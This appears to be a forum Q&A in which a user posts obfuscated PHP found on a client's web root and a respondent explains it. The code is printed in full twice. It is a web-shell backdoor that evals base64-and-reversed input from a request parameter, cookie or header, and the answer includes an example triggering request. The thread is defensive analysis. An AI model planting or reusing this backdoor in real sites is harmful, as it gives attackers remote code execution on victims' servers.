Menu
I found this code on the root of a client's site. I decrypted it to mean the following:
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );
$brownies('L','9','$','>','','K','H','B','m', $i=array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["geccmscu"]) ? $i["geccmscu"] : (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die ); eval(strrev(base64_decode(strrev($a)))););
It looks like it's getting code from the cookie or user and evaluating it, but I can't tell further from there.
Anyone have insight for this?
985
Here the code with some indentation:
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );
$brownies('L','9','$','>','','K','H','B','m',
$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["geccmscu"]) ? $i["geccmscu"] :
(isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die );
eval(strrev(base64_decode(strrev($a)))););
First it checks if among the cookies, request and server values (the $i variable), there is a "geccmscu" key. If not, it checks if a header with the same name is defined ("HTTP_GECCMSCU"). If not, the script stops there.
If that "geccmscu" variable was defined somewhere, it is stored in $a. The script then decodes it (the content is "encrypted" with strrev and base64) and executes it via eval()
Basically, someone could attack your server with an HTTP query such as this:
GET http://example.com?geccmscu=someevilphpcode
Then "someevilphpcode" will be decoded and executed on your server.
164
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
